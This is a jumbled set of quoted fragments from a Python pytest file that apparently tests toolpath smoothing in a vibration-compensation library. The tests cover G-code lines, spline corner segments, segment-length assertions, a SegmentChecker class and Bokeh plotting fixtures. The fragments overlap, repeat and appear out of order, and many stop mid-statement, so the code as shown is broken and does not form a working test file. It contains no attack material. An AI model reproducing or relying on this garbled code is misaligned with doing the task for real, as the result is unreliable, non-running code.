"\"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\")) ret = [] yield ret plt.save(ret)",
"end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths)",
"test_three_long_lines_with_z_move(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 Z10\", \"G1",
"is not close enough\" def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error",
"= data.end_xy[l] if l != data.start_xy.shape[0] - 1: self.next_start_point = data.start_xy[l+1] self.next_end_point =",
"X20 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\")",
"l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100",
"l, s, start, end): checker = SegmentChecker(data, l, s, start, end, True) checker.check_corner_spline_order()",
"[] yield ret plt.save(ret) def generate_curves(gcode, maximum_error): data = read_gcode(gcode, maximum_error) return data",
"read_gcode(gcode, maximum_error) return data @pytest.fixture(scope=\"function\") def plotter(figures, request): def plot(data: Data): p =",
"l, s, start, end): checker = SegmentChecker(data, l, s, start, end, False) if",
") p.circle( points[:,0], points[:,1], size=4, fill_color=\"white\" ) figures.append(p) return plot def point_on_line(linea, lineb,",
"assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self): msg",
"path, filename = os.path.split(os.path.realpath(__file__)) path = os.path.join(path, \"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] +",
"def test_straight_line(plotter): data = generate_curves([ \"G1 X100 Y200\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() elif start == \"end\":",
"np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data) plotter(data)",
"where the current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and",
"def test_45_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y100\" ], maximum_error=0.01)",
"point of the spline segment is not on the end of the line\"",
"def test_very_obtuse_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y1\" ], maximum_error=0.01)",
"segment is not on the end of the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start,",
"end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end, 1.0) end_error_segment = \"The end point of",
"straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1]) assert",
"False, \"Invalid start type\" if start == \"middle\" or end == \"middle\": checker.check_corner_middle_normal()",
"test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([ \"G1 X20 Y0\", \"G1 X30 Y-0.1\" ], maximum_error=0.01) assert",
"data.smoothed_toolpath.start_xy.shape[0], 0.1) points = data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\" ) p.circle(",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1) check_distances(data) plotter(data)",
"check_corner_spline_order(self): assert self.spline_end > self.spline_mid, \\ \"The endpoint of the corner spline is",
"\"G1 X10 Y0\", \"G1 X20 Y0.1\", \"G1 X30 Y0.3\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"s=3, start=\"middle\", end=\"middle\") straight_segment(data, l=2, s=4, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 +",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter):",
"\"G1 X0 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\",",
"maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1,",
"data = generate_curves([ \"G1 X-100 Y-100\", \"G1 X-200 Y-100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]) assert",
"match\" if line <= 1.0: line_dist = self.start_line_dist + self.line_length * line else:",
"numpy as np import scipy as sp import vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\") def",
"\"Invalid start type\" if start == \"start\" and end == \"end\": checker.check_point_on_middle_of_line() else:",
"np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data) def test_two_straight_lines(plotter): data = generate_curves([ \"G1 X50",
"Y50\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data, l=0, s=0,",
"straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"middle\") straight_segment(data, l=1, s=2,",
"0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12),",
"is not on the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) ==",
"point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self): msg =",
"data.start_xy.shape[0] - 1: self.start_next_line_dist = self.start_line_dist + self.line_length self.next_line_length = xy_lengths[l+1] def check_distance(self,",
"line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self): msg = \"The middle point",
"point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point,",
"\"The start point of the spline segment is not on the line\" assert",
"def test_obtuse_corner_with_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\" ], maximum_error=0.01)",
") check_distances(data) plotter(data) def test_90_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100",
"yield ret plt.save(ret) def generate_curves(gcode, maximum_error): data = read_gcode(gcode, maximum_error) return data @pytest.fixture(scope=\"function\")",
"is not on the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) ==",
"match_aspect=True, lod_threshold=None, title=request.node.name ) p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:, 0], y0=data.start_xy[:, 1], y1=data.end_xy[:, 1],",
"l=1, s=3, start=\"middle\", end=\"middle\") straight_segment(data, l=2, s=4, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10",
"+ np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_obtuse_corner(plotter): data = generate_curves([ \"G1 X100",
"checker.check_line_start_point_end() else: assert False, \"Invalid start type\" if start == \"start\" and end",
"end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1])",
"np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def straight_segment(data, l,",
"corner): self.data = data self.s = s self.start = start self.end = end",
"def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def",
"corner: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid = l + 1.0 self.spline_end = data.smoothed_toolpath.segment_end[s] else:",
"end type\" checker.check_continuity() def check_distances(data): t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(),",
"test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X30 Y0.1\" ], maximum_error=0.01) assert",
"== 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data,",
"point of the spline segment does not match the line start point\" assert_array_almost_equal(self.spline(self.spline_start),",
"SegmentChecker(data, l, s, start, end, False) if start == \"start\": checker.check_start_point_start() elif start",
"\"G1 X100 Y0\", \"G1 X0 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data,",
"os.path.join(path, \"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\")) ret = [] yield ret",
"pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_acute_corner(plotter): data = generate_curves([ \"G1",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10",
"- mid) class SegmentChecker(object): def __init__(self,data, l, s, start, end, corner): self.data =",
"end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1])",
"abs=0.1) check_distances(data) plotter(data) def test_45_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0",
"\"G1 X30 Y-0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\",",
"end=\"on\") straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1,",
") ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points = data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1], line_width=2,",
"xy_lengths[l+1] def check_distance(self, spline, line): msg = \"The spline start distance does not",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_obtuse_corner(plotter):",
"= generate_curves([ \"G1 X100 Y200\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data, l=0,",
"np.linalg.norm(point - mid) class SegmentChecker(object): def __init__(self,data, l, s, start, end, corner): self.data",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx( np.linalg.norm([50, 50]) + np.linalg.norm([50, 50]) ) check_distances(data) plotter(data) def",
"\"The spline start distance does not match\" if line <= 1.0: line_dist =",
"start == \"end\": checker.check_line_start_point_end() else: assert False, \"Invalid start type\" if start ==",
"on the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3),",
"maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") straight_segment(data, l=1, s=1,",
"self.next_line_length = xy_lengths[l+1] def check_distance(self, spline, line): msg = \"The spline start distance",
"not on the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0,",
"pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_obtuse_corner(plotter): data = generate_curves([ \"G1",
"test_very_acute_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y1\" ], maximum_error=0.01) assert",
"spline segment\" if self.s > 0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end == self.spline_start,",
"s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
"segment is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12),",
"\"middle\": checker.check_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def corner_segment(data, l, s,",
"< data.start_xy.shape[0] - 1: self.start_next_line_dist = self.start_line_dist + self.line_length self.next_line_length = xy_lengths[l+1] def",
"l != data.start_xy.shape[0] - 1: self.next_start_point = data.start_xy[l+1] self.next_end_point = data.end_xy[l+1] self.spline =",
"plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X30 Y0.1\" ],",
"straight_segment(data, l=1, s=3, start=\"end\", end=\"end\") straight_segment(data, l=3, s=4, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <",
"+ np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10,",
"spline segment is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0,",
"Y-100\", \"G1 X-200 Y-100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0,",
"1: self.start_next_line_dist = self.start_line_dist + self.line_length self.next_line_length = xy_lengths[l+1] def check_distance(self, spline, line):",
"self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self): msg = \"The middle",
"check_line_start_point_end(self): msg = \"The start point of the spline segment is not on",
"checker.check_corner_middle_short() if end == \"on\": checker.check_corner_end_point_on() elif end == \"middle\": checker.check_corner_end_point_middle() else: assert",
"assert prev_end == self.spline_start, \\ \"The previous segment does not end where the",
"mid) class SegmentChecker(object): def __init__(self,data, l, s, start, end, corner): self.data = data",
"def figures(): path, filename = os.path.split(os.path.realpath(__file__)) path = os.path.join(path, \"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path,",
"segment is not on the line\" def check_end_point_on(self): assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) ==",
"<\\ 10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10",
"data = generate_curves([ \"G1 X20 Y0\", \"G1 X30 Y-0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"250), match_aspect=True, lod_threshold=None, title=request.node.name ) p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:, 0], y0=data.start_xy[:, 1], y1=data.end_xy[:,",
"line_width=2, line_color=\"blue\", line_dash=\"solid\" ) p.circle( points[:,0], points[:,1], size=4, fill_color=\"white\" ) figures.append(p) return plot",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10",
"the current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and \\",
"= xy_lengths[l+1] def check_distance(self, spline, line): msg = \"The spline start distance does",
"the current segment start do not match up\" def check_corner_spline_order(self): assert self.spline_end >",
"l=1, s=3, start=\"on\", end=\"on\") straight_segment(data, l=2, s=4, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300",
"\"The start point of the spline segment does not match the line start",
"assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 +",
"not match the line end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end, 1.0) end_error_segment =",
"ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points = data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1], line_width=2, line_color=\"blue\",",
"point) + np.linalg.norm(lineb - point)\\ - np.linalg.norm(linea - lineb) def point_on_middle_of_line(linea, lineb, point):",
"do not match up\" def check_corner_spline_order(self): assert self.spline_end > self.spline_mid, \\ \"The endpoint",
"y_range=(-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name ) p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:, 0], y0=data.start_xy[:, 1],",
"\\ \"The previous segment end distance and the current segment start do not",
"elif start == \"end\": checker.check_line_start_point_end() else: assert False, \"Invalid start type\" if start",
"abs=0.001), \\ \"The previous segment end distance and the current segment start do",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1) check_distances(data) plotter(data) def test_three_short_lines(plotter): data = generate_curves([ \"G1",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_135_corner(plotter): data",
"start point of the spline segment is not on the line\" assert point_on_line(self.start_point,",
"self.check_distance(self.spline_end, 1.5) def check_continuity(self): msg = \"There's a discontinuity at the end of",
"], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") straight_segment(data, l=1,",
"data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\")",
"\\ pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([",
"self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start + self.spline_end) / 2.0",
"is not on the end of the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0)",
"maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1,",
"straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2,",
"s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
"l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\",",
"s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\")",
"def test_135_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y100\" ], maximum_error=0.01)",
"assert False, \"Invalid end type\" checker.check_continuity() def check_distances(data): t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10)",
"the line start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0) def check_start_point_on(self): msg =",
"self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l] if l < data.start_xy.shape[0] - 1: self.start_next_line_dist",
"+ np.linalg.norm([50, 50]) ) check_distances(data) plotter(data) def test_90_corner(plotter): data = generate_curves([ \"G1 X100",
"np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_acute_corner(plotter): data = generate_curves([ \"G1 X100 Y0\",",
"\"G1 X10 Y0\", \"G1 X30 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data,",
"self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\",
"plotter(data) def test_two_straight_lines(plotter): data = generate_curves([ \"G1 X50 Y50\", \"G1 X100 Y100\" ],",
"checker.check_continuity() def check_distances(data): t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def",
"\\ pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines(plotter): data = generate_curves([",
"==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data) def test_two_straight_lines(plotter): data = generate_curves([ \"G1 X50 Y50\",",
"\"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data, l=0, s=0, start=\"start\",",
"< 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1) check_distances(data) plotter(data) def test_three_short_lines(plotter): data",
"= generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\", \"G1 X30 Y0.3\" ], maximum_error=0.01)",
"s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") straight_segment(data, l=1, s=3, start=\"end\", end=\"end\")",
"straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") straight_segment(data, l=1, s=1, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
"end of the spline segment\" if self.s > 0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert",
"< 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1) check_distances(data) plotter(data) def test_45_corner(plotter): data =",
"of the spline segment is not on the line\" def check_end_point_on(self): assert point_on_line(self.start_point,",
"match the line start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0) def check_start_point_on(self): msg",
"end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
"= data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start + self.spline_end) / 2.0 xy_lengths",
"check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter): data = generate_curves([ \"G1 X-100 Y-100\", \"G1 X-200 Y-100\"",
"discontinuity at the end of the spline segment\" if self.s > 0: prev_end",
"__init__(self,data, l, s, start, end, corner): self.data = data self.s = s self.start",
"def check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle = \"The",
"plt @pytest.fixture(scope=\"module\") def figures(): path, filename = os.path.split(os.path.realpath(__file__)) path = os.path.join(path, \"output\") os.makedirs(path,",
"segment does not match the line start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0)",
"\"G1 X100 Y200\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data, l=0, s=0, start=\"start\",",
"os.path.splitext(filename)[0] + \".html\")) ret = [] yield ret plt.save(ret) def generate_curves(gcode, maximum_error): data",
"assert self.spline.distance(spline) <= line_dist and \\ self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \\ msg def",
"def check_point_on_line(self): msg = \"The middle point of the spline segment is not",
"of the spline segment is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start))",
"self.end_point, self.spline(self.spline_end)) == \\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end))",
"def check_corner_spline_order(self): assert self.spline_end > self.spline_mid, \\ \"The endpoint of the corner spline",
"spline segment does not match the line start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start,",
"the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self): msg = \"The middle",
"generate_curves(gcode, maximum_error): data = read_gcode(gcode, maximum_error) return data @pytest.fixture(scope=\"function\") def plotter(figures, request): def",
"l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths)",
"spline segment does not match the line end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end,",
"start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1) check_distances(data)",
"y1=data.end_xy[:, 1], line_width=1, line_color=\"red\", line_dash=\"dotted\" ) ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points =",
"abs=1e-12), msg def check_line_start_point_middle(self): msg = \"The start point of the spline segment",
"segment end distance and the current segment start do not match up\" def",
"def test_three_long_lines(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 X0",
"\\ \"The endpoint of the corner spline is before the line segment end\"",
"<= 1.0: line_dist = self.start_line_dist + self.line_length * line else: line_dist = self.start_next_line_dist",
"checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if end == \"end\": checker.check_end_point_end() elif end == \"on\": checker.check_end_point_on()",
"data.start_xy, axis=1) self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l] if l < data.start_xy.shape[0] -",
"Y0\", \"G1 X200 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0,",
"plotter(data) def test_obtuse_corner_with_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\" ],",
"start=\"on\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10,",
"* (line-1.0) assert self.spline.distance(spline) <= line_dist and \\ self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \\",
"l=2, s=4, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10,",
"point of the spline segment is not on the middle of the line\"",
"end == \"on\": checker.check_end_point_on() elif end == \"middle\": checker.check_end_point_middle() else: assert False, \"Invalid",
"point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \\ pytest.approx(0, abs=1e-12), msg def check_line_start_point_middle(self): msg = \"The",
"\"G1 X20 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\",",
"def plotter(figures, request): def plot(data: Data): p = plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250, 250),",
"vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\") def figures(): path, filename = os.path.split(os.path.realpath(__file__)) path = os.path.join(path,",
"point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0) def check_start_point_on(self): msg = \"The start point",
"data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter): data = generate_curves([ \"G1",
"spline segment is not on the middle of the line\" def check_end_point_middle(self): assert",
"20 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1)",
"self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001),",
"\"The closest point of the corner is not close enough\" def check_corner_middle_normal(self): assert",
"numpy.testing import * import numpy as np import scipy as sp import vibration_compensation.bokeh_imports",
